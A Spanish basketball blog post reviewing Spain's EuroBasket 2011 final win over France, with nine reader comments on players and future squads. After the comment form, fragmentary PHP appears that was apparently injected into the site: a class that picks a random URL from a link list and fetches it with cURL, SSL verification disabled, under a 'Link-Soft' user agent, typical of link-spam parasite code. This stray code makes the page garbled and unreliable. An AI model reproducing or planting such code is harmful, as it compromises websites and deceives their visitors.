EuroNBAsket 2011: Todos los días sale el sol

19 de September de 2011 por TheDeerHunter
“I think this has been the strongest European Championship in history…” Dusan Ivkovic

Se cumplió la lógica y España hizo valer ayer su condición de equipo superdotado para repetir el oro del 2009, en el que efectivamente ha sido uno de los Eurobasket más impresionantes que hemos vivido.

Y en esta ocasión no es que Francia les regalara nada. Salieron a morder como ya lo había hecho Macedonia en semifinales. Con un Tony Parker casi imparable durante todo el torneo, Noah sosteniendo atrás y minimizando muy bien a Pau Gasol, más las contribuciones puntuales de Batum, Diaw y Gelabale. Si acaso fue De Colo quien en esta ocasión no estuvo a la altura. Tiene mucho mérito, por la parte que le toca a los “Bleus”, aguantar el ritmo imperial de 25 puntos por cuarto que impuso España sin bajar los brazos prácticamente hasta el final. Lograron la complicada tarea de igualar bajo tableros, estar a la altura en distribución e incluso lanzar parcialmente mejor que sus rivales, pero no fue ni de lejos suficiente para aspirar realmente a la victoria.

España demostró una vez más que es literalmente un exceso. Si no te destrozan los “Gasoles” lo hace Rudy, un Calderón motivadísimo o Serge Ibaka. Éste último deslumbró en el segundo cuarto con el top 5 de tapones del torneo en apenas 4 minutos. Y después siempre está Navarro, a quien hay que darle de comer a parte. La punta de talento del equipo. Único jugador, y a la postre MVP, que ha sido capaz de arrasar rivales en apenas unos pocos minutos de inspiración en cada uno de los cruces. Hay pocas cosas más bellas en el baloncesto que uno de esos momentos de puro arte que sólo el es capaz de ofrecer.

A ese nivel, a lo único que puede aspirar cualquier otra selección Europea es a plantar cara. Nos hubiera gustado ver a Francia con todo su poderío NBA al completo, pero difícilmente puedes contar con que la presencia de Turiaf, Michael Pietrus, Beaubois y Mahinmi hubiera supuesto la garantía al título. Ambos volverán a verse las caras el año que viene en Londres.

Rusia completó el podio al superar, esta vez por dos canastas y sin “moñas” de por medio, a Macedonia. El quinteto ideal fue el que ya había adelantado algún compañero: Parker, McCalebb, Navarro, Kirilenko, Pau que, si bien es bastante poco purista es el más justo con los 5 mejores jugadores del torneo.

Comenta

9 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Cuando Navarro se pone en modo berserker de la canasta es una locura, parece que está intentando meter conguitos en una piscina olímpica, aunque creo que el MVP debería haber sido compartido con Pau.

      Citar

  2. Denise dice:
    #2

    Mucho merito el de Francia el de aguantar este vendava durante 35 minutos. Tras este éxito de los franceses, seguro que los cuatro NBA citados en el articulo más Kirksay se unan al grupo y se conviertan en los terceros en discordia. No veo a ningún otro equipo ni europeo ni sudamericano capaz de ganar a EEUU, España y Francia.
    La bandeja fallada completamente solo por el macedonio Stojanovski para forzar la prorroga, uno de los mayores errores significativos que he visto. Increible como puede fallarse eso.

      Citar

  3. Sancho88 dice:
    #3

    Sí, tenía la cara de culpabilidad reflejada. Aunque yo lo entiendo en parte por el cansancio y la presión acumulada de esos tíos. Una rotación de 6 jugadores frente a los 11 con los que suele jugar Rusia. La bandeja es infallable, pero… muchos minutos de cansancio.

    Y por cierto, para que vaya Kirskay habrá que ver la reacción de Gelabale, que ya se la montó al entrenador la otra vez que fue, porque fue él el que se quedaba fuera. Habrá que ver quien cede ahí y o como se puede resolver eso.

      Citar

  4. Denise dice:
    #4

    Parker-Mickael Pietrus-Batum-Diaw-Noah
    De Colo-Gelabale-Kirksay-Beaubois-Turiaf-Mahinmi-Traore .

    Quitaría a Kahudi, Seraphin, Florent Pietrus y a los otros dos bases, Tchicamboud y Albicy, de todas formas Parker juega el partido entero practicamente….

      Citar

  5. Txusma dice:
    #5

    Impresionante selección la francesa. Los veo como dominadores en Europa a partir de 2012.

    Por cierto, le podemos dar parte de mérito a Scariolo, no? Creo que en los cuartos no puede haber habido queja de sus rotaciones y suerte, suerte que nos llevamos a Sada. Si no llega a estar Sada en la final a lo mejor el resultado es diferente.

      Citar

  6. Nacho dice:
    #6

    Yo no los veo dominadores, hasta que España deje de serlo, y Navarro y Pau llegarán al 2014, seguro. Que pondrán las cosas más chungas seguro.
    Por otro lado, yo no cambiaría a Seraphin por Turiaf, ofrece más proyección el primero, y tiene más movilidad ofensiva, Turiaf (aparte de ser el tipo de jugador que quieres ver como espectador, por que es un show) aporta más físico, y de eso andan sobrados, y más intimidación, pero creo que deberían buscarla por otro lado, (Noah).
    Tampoco se por qué no ha ido, pero estos chicos que sí han estado se merecen seguir. En esta onda lo que aporta Florent Pietrus es equipo, por lo que he oído, si le preguntas a los jugadores, al 1º que quieren tener es a él. Y Francia ahora necesita más equipo que nuevas individualidades.

      Citar

  7. Txusma dice:
    #7

    Ui, a mi me da que Gasol deja la selección tras las Olimpiadas. Tendrá 32 tacos y aún le quedarán 2 años más en la NBA. Tiene que empezar a cuidarse. La baja de Gasol por si sola ya nos hace caer bastante (recordamos el Mundobasket de Turquia) pero no sé yo si Navarro tb querrá estirar su estancia en la Selección hasta los 34. Sin estos 2, habría que pelear muy mucho por las medallas.

      Citar

  8. Nacho dice:
    #8

    Sí, pero el mundial 2014 es en España, y eso motiva, que dejen pasar el eurobasket del 2013 puede ser, pero un mundial en casa…

      Citar

  9. Txusma dice:
    #9

    Es verdad! Lo olvidaba. Pues vaya papelón para Pau. Del Eurobasket 2013 pasarán sin duda pq ni siquiera clasifica para los JJOO.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>